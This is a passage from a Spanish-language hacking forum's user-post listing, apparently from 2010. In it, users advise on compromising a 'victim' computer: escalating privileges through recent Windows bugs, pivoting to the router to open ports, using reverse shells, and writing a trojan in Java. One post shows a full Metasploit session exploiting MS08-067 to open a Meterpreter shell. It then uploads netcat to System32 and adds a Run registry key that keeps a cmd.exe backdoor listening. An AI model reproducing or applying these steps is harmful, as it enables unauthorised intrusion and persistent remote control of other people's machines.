Cita de: kamsky en 31 Julio 2010, 13:18 PMMi victima tendria que clicar el aceso directo? Y que conseguiré con eso? Shell de system?
http://www.exploit-db.com/exploits/14403/
Saludos
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: kamsky en 31 Julio 2010, 13:18 PMMi victima tendria que clicar el aceso directo? Y que conseguiré con eso? Shell de system?
http://www.exploit-db.com/exploits/14403/
Cita de: kamsky en 31 Julio 2010, 13:03 PMO soy muy inutil o no veo ninguno de escala de privilegios xD
http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=windows&filter_author=&filter_platform=45&filter_type=0&filter_port=&filter_osvdb=&filter_cve=
Cita de: kamsky en 31 Julio 2010, 12:52 PMEntiendo...
si, suele haber acceso por telnet a los routers, una vez que te logues tendrás un menú parecido al que te sale por Web, en mi caso este:
Main Menu
1. ADSL Link State
2. LAN
3. WAN
4. DNS Server
5. Route Setup
6. NAT
7. Firewall
8. Quality Of Service
9. Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->
Cita de: kamsky en 31 Julio 2010, 12:46 PMBien me pongo a ello, aceso al router? Mmm desde consola?
tienes acceso al router desde el PC??
busca bugs en windows recientes que te permitan escalar privilegios, últimamente hay bastantes
Cita de: kamsky en 31 Julio 2010, 12:36 PMasi lo he intentado pero ahora mi supuesta victima no tengo permisos de administracion :S
si tienes acceso al PC, salta desde este a la conf del router y abre los puertos, no deberías de tener muchos problemas, otra opción es una reverse shell, que sea la víctima la que se conecte a tí
Cita de: Lord R.N.A. en 31 Julio 2010, 04:39 AMY quien quiere lammearte a ti? xD es coña no te lo tomes a mal xDCita de: egyware en 31 Julio 2010, 04:02 AMCita de: Lord R.N.A. en 31 Julio 2010, 01:36 AMTu lo has dicho, el sistema operativo de java es el Runtime(JRE)Cita de: egyware en 30 Julio 2010, 04:03 AMCita de: Zzombi en 30 Julio 2010, 03:12 AMPrecisamente, tu no eliges una victima al azar la victima tiene Java
y si la victima no tiene la JVM
El malware no puede tener dependencias, unica dependencia aceptable aun es el sistema operativo.
Lo bueno de un troyano en Java no dependes del OS, solo del Runtime :/
depende de si tiene o no Java Instalado... en mi caso no utilizo Java, por lo tanto soy inmune... eso es malo para el malware.
Cita de: nico56 en 30 Julio 2010, 19:07 PMNo te has enterado en las 7 u 8 respuestas que te han dado?
Que es codear para el netbeans? Yo uso el eclipse. Se puede o no compilar como si fuera un programa ejecutable ?
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7808 updated 7 days ago (2009.12.10)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xx
RHOST => xx.xx.xx.xx
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.3 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST xx.xx.xx.xx no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish[*] Selected Target: Windows XP SP2 Spanish (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (xx.xx.xx.xx:1934 -> xx.xx.xx.xx:4444)
meterpreter >
meterpreter > upload /root/tools/nc.exe C:\\Windows\\System32\\
[*] uploading : /root/tools/nc.exe -> C:\Windows\System32\
[*] uploaded : /root/tools/nc.exe-> C:\Windows\System32\\nc.exe
meterpreter >
meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v WindowsCore -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter >
Cita de: Zzombi en 30 Julio 2010, 03:12 AMentonces no esta a la moda!
y si la victima no tiene la JVM